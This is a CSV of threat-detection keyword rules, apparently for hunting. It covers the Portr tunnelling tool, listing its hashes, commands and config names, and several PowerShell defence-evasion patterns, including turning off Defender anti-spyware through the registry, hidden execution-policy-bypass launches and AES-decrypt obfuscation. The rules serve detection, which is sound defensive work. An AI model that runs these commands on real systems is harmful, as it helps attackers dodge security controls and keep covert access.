"*466869834998e6668cf4b7e73ed043c145c73c5a62e21d1bbf1ebf7cde3f86bd*",".{0,1000}466869834998e6668cf4b7e73ed043c145c73c5a62e21d1bbf1ebf7cde3f86bd.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*48ef85a7f6eea1b650affacb62f046eca8a965f134482ff808e4a148a69e72b5*",".{0,1000}48ef85a7f6eea1b650affacb62f046eca8a965f134482ff808e4a148a69e72b5.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*4bc1b107cd497c88dfbc262ff7bcae4e85874848df0435bb7ecb8334f23b19b3*",".{0,1000}4bc1b107cd497c88dfbc262ff7bcae4e85874848df0435bb7ecb8334f23b19b3.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*4d797b16f3aa81a13bc1736b37e783336bcfb9a538148810b3d1ec8fe592e50c*",".{0,1000}4d797b16f3aa81a13bc1736b37e783336bcfb9a538148810b3d1ec8fe592e50c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*51f4ff1014c223e9f936e13e8d053dddb16678c65e87b2cfa63cad36564d243c*",".{0,1000}51f4ff1014c223e9f936e13e8d053dddb16678c65e87b2cfa63cad36564d243c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*54538a9a0676b8d5bb23c42250df271b736052c1f5b7168a73c14bc65aa017dc*",".{0,1000}54538a9a0676b8d5bb23c42250df271b736052c1f5b7168a73c14bc65aa017dc.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*5757b774c407cc8a6ce5f9601b244730635a30efcb0015fe454610850b14d38d*",".{0,1000}5757b774c407cc8a6ce5f9601b244730635a30efcb0015fe454610850b14d38d.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*5b036a1f20522f45ddfe9956f4014efe311daed29a6888959f0822ff72da948f*",".{0,1000}5b036a1f20522f45ddfe9956f4014efe311daed29a6888959f0822ff72da948f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*61924a52c149b6ad50e462cebbdfc14c570293abdf1c97bddfe7c0c7580ada31*",".{0,1000}61924a52c149b6ad50e462cebbdfc14c570293abdf1c97bddfe7c0c7580ada31.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*673de62a71e95d4b855f3a8c616edbe2b51f066625cdef9924c76a1f021a660c*",".{0,1000}673de62a71e95d4b855f3a8c616edbe2b51f066625cdef9924c76a1f021a660c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*6db7f9491dc7389e6f64cd4ae549eb3a304b1868309a40b7a175c0206c681bc9*",".{0,1000}6db7f9491dc7389e6f64cd4ae549eb3a304b1868309a40b7a175c0206c681bc9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*6f4cee01855c127463f149bb94adc8bec1a5b9b19f8edfd8471002effbdd1fdb*",".{0,1000}6f4cee01855c127463f149bb94adc8bec1a5b9b19f8edfd8471002effbdd1fdb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*727b1692111d8e799e8deb7f1243503994f08d71488805d3f8c35015b142a6b7*",".{0,1000}727b1692111d8e799e8deb7f1243503994f08d71488805d3f8c35015b142a6b7.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*7a9f4a3bfc2a24075f9331f9ac21655b270ca43bb1845bc8f81e56943374a775*",".{0,1000}7a9f4a3bfc2a24075f9331f9ac21655b270ca43bb1845bc8f81e56943374a775.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*8027e8c3404952986b4323ee0773650bab81ae3cb36eb5f643b95c4f2c912ebf*",".{0,1000}8027e8c3404952986b4323ee0773650bab81ae3cb36eb5f643b95c4f2c912ebf.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*83a82600aa1102569a14bb436c08b4abde68c4b47bd05934a4fed0ca8d187abd*",".{0,1000}83a82600aa1102569a14bb436c08b4abde68c4b47bd05934a4fed0ca8d187abd.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*85eaf5c3848e384ff88f16bf59f8d6e31194e01b2b8be58191de5a74d03348be*",".{0,1000}85eaf5c3848e384ff88f16bf59f8d6e31194e01b2b8be58191de5a74d03348be.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*869df81bed2d14ea117e02aaff9894b9f9eac2b6c8802dd7be37eb14da8cca48*",".{0,1000}869df81bed2d14ea117e02aaff9894b9f9eac2b6c8802dd7be37eb14da8cca48.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*892dfce05bfcab969306a1034ef0fc0decc52d82b43cda8b6c395549c8ef1133*",".{0,1000}892dfce05bfcab969306a1034ef0fc0decc52d82b43cda8b6c395549c8ef1133.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*8e293b5a49ada7798b6d681ec267efecd5c6fbd12163ac13b042707b80f56c50*",".{0,1000}8e293b5a49ada7798b6d681ec267efecd5c6fbd12163ac13b042707b80f56c50.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*906172da211b4b657ad01652ffa8911d5add169b3eca2c77f5f1b79a178fe977*",".{0,1000}906172da211b4b657ad01652ffa8911d5add169b3eca2c77f5f1b79a178fe977.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*926dd1743afb553ef123f185b1ea1a0a463a25b4c4d0635142fa4ee4d5aceedb*",".{0,1000}926dd1743afb553ef123f185b1ea1a0a463a25b4c4d0635142fa4ee4d5aceedb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*97fc48554850cc143f262d6cc01fa415c7ff3bc517d2505795b70f447b0de993*",".{0,1000}97fc48554850cc143f262d6cc01fa415c7ff3bc517d2505795b70f447b0de993.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*9b50261daa62f2440c9e3ae0399615fe0b4d5dc807f4f9f1fdcd8a80bc0ab22f*",".{0,1000}9b50261daa62f2440c9e3ae0399615fe0b4d5dc807f4f9f1fdcd8a80bc0ab22f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*9bf17e192c1d67d3116bee309c16ccdeaae36a68e53db5b555ccaf9455a255b1*",".{0,1000}9bf17e192c1d67d3116bee309c16ccdeaae36a68e53db5b555ccaf9455a255b1.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*a577a27e8304b63365699d0220bade895000da9fde1b29fdb0925292dcff0b4f*",".{0,1000}a577a27e8304b63365699d0220bade895000da9fde1b29fdb0925292dcff0b4f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*a7b789b5fbd81fafca5a5dca4671de13c6bf3b54b807c513d03bd1ee3f5290a9*",".{0,1000}a7b789b5fbd81fafca5a5dca4671de13c6bf3b54b807c513d03bd1ee3f5290a9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*a819a2e3e513712ec9dcba8129b7471aafc70ca6631561a8f6a4881a51ffa2c4*",".{0,1000}a819a2e3e513712ec9dcba8129b7471aafc70ca6631561a8f6a4881a51ffa2c4.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*a853e1ad13c03ed6e28dba69cd407bfb2bdde3401c83abe79ab57a42fbd8968a*",".{0,1000}a853e1ad13c03ed6e28dba69cd407bfb2bdde3401c83abe79ab57a42fbd8968a.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*aea26b638e19ae54c752ccc0d9985bc6ccf0214a56ca5b2b26714feef2d95ac9*",".{0,1000}aea26b638e19ae54c752ccc0d9985bc6ccf0214a56ca5b2b26714feef2d95ac9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*amalshaji/portr*",".{0,1000}amalshaji\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*amalshaji/taps/portr*",".{0,1000}amalshaji\/taps\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*be21413da8a75c62583b1c9eaf5194f5853f5ee8aba7e67510069717a0fbfcf2*",".{0,1000}be21413da8a75c62583b1c9eaf5194f5853f5ee8aba7e67510069717a0fbfcf2.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*c3dcf5597629c40fa47791ba86420ff1322ca0adb6110b4fceec6168f5141ee7*",".{0,1000}c3dcf5597629c40fa47791ba86420ff1322ca0adb6110b4fceec6168f5141ee7.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*c948e37486bb247fbbc9f20b5040a11f28f642f5760be9abda81fc979c9911f1*",".{0,1000}c948e37486bb247fbbc9f20b5040a11f28f642f5760be9abda81fc979c9911f1.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*ccf830a3d9985235d37d82bc38432568ff15744e3772fbf52c947914cdd6745a*",".{0,1000}ccf830a3d9985235d37d82bc38432568ff15744e3772fbf52c947914cdd6745a.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*db73ab5dce549d531bd7e8ec51a89bf5040da07200e2834e7b652a0384db783b*",".{0,1000}db73ab5dce549d531bd7e8ec51a89bf5040da07200e2834e7b652a0384db783b.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*e2ffe6675e592cf2760e3b9de2fd6a7c0298226b76f86f26b084de63ff4be574*",".{0,1000}e2ffe6675e592cf2760e3b9de2fd6a7c0298226b76f86f26b084de63ff4be574.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*ecdf4ee43944adcc0aa55f707711a0be5a0ff539792175195aeed7e3a860e457*",".{0,1000}ecdf4ee43944adcc0aa55f707711a0be5a0ff539792175195aeed7e3a860e457.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*ee64735aef9a98eff32fa75e2bf8df53b3c8312d85ca1d02e37c01d06fa6c47e*",".{0,1000}ee64735aef9a98eff32fa75e2bf8df53b3c8312d85ca1d02e37c01d06fa6c47e.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*f1aa7c960a64c65548d23d2a77b3aa04844695174e44c7e04e0094190a1b8b46*",".{0,1000}f1aa7c960a64c65548d23d2a77b3aa04844695174e44c7e04e0094190a1b8b46.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*f9ec1153b825b2a9bdb5bc59df82bfb08b7b85fe371c591f37c6748957378591*",".{0,1000}f9ec1153b825b2a9bdb5bc59df82bfb08b7b85fe371c591f37c6748957378591.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*http://localhost:7777*",".{0,1000}http\:\/\/localhost\:7777.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*https://portr.dev/client/installation/*",".{0,1000}https\:\/\/portr\.dev\/client\/installation\/.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*Portr - Expose local ports to public URLs*",".{0,1000}Portr\s\-\sExpose\slocal\sports\sto\spublic\sURLs.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr auth set --token *",".{0,1000}portr\sauth\sset\s\-\-token\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr -c *.yaml*",".{0,1000}portr\s\-c\s.{0,1000}\.yaml.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr http *",".{0,1000}portr\shttp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr tcp *",".{0,1000}portr\stcp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr.exe http *",".{0,1000}portr\.exe\shttp\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr_admin.apis*",".{0,1000}portr_admin\.apis.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr_admin.db*",".{0,1000}portr_admin\.db.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr_admin.models.auth*",".{0,1000}portr_admin\.models\.auth.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr_admin.services*",".{0,1000}portr_admin\.services.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*PORTR_ADMIN_GITHUB_CLIENT_ID*",".{0,1000}PORTR_ADMIN_GITHUB_CLIENT_ID.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*PORTR_ADMIN_GITHUB_CLIENT_SECRET*",".{0,1000}PORTR_ADMIN_GITHUB_CLIENT_SECRET.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*portr_next_url*",".{0,1000}portr_next_url.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"* -ep Bypass-nop function *[System.Security.Cryptography.Aes]::Create()*.CreateDecryptor()*.TransformFinalBlock*[System.Text.Encoding]::Utf8.GetString*",".{0,1000}\s\-ep\sBypass\-nop\sfunction\s.{0,1000}\[System\.Security\.Cryptography\.Aes\]\:\:Create\(\).{0,1000}\.CreateDecryptor\(\).{0,1000}\.TransformFinalBlock.{0,1000}\[System\.Text\.Encoding\]\:\:Utf8\.GetString.{0,1000}","greyware_tool_keyword","powershell","obfuscation techniques with powershell","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -ep Unrestricted -nop function *[System.Security.Cryptography.Aes]::Create()*.CreateDecryptor()*.TransformFinalBlock*[System.Text.Encoding]::Utf8.GetString*",".{0,1000}\s\-ep\sUnrestricted\s\-nop\sfunction\s.{0,1000}\[System\.Security\.Cryptography\.Aes\]\:\:Create\(\).{0,1000}\.CreateDecryptor\(\).{0,1000}\.TransformFinalBlock.{0,1000}\[System\.Text\.Encoding\]\:\:Utf8\.GetString.{0,1000}","greyware_tool_keyword","powershell","obfuscation techniques with powershell","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*",".{0,1000}\s\-Name\sDisableAntiSpyware\s\-Value\s1\s\-PropertyType\sDWORD\s\-Force.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"* -NOP -WIND HIDDeN -eXeC BYPASS -NONI *",".{0,1000}\s\-NOP\s\-WIND\sHIDDeN\s\-eXeC\sBYPASS\s\-NONI\s.{0,1000}","greyware_tool_keyword","powershell","suspicious powershell arguments order used by many exploitation tools","T1059.001 - T1059.003 - T1027.009","TA0002 - TA0005","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*[System.Environment]::GetEnvironmentVariable('username')*",".{0,1000}\[System\.Environment\]\:\:GetEnvironmentVariable\(\'username\'\).{0,1000}","greyware_tool_keyword","powershell","alternativeto whoami","T1033 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","6","N/A","N/A","N/A","N/A"
"*\powershell.exe* += hidden*",".{0,1000}\\powershell\.exe.{0,1000}\s\+\=\shidden.{0,1000}","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with  powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","7","10","N/A","N/A","N/A","N/A"
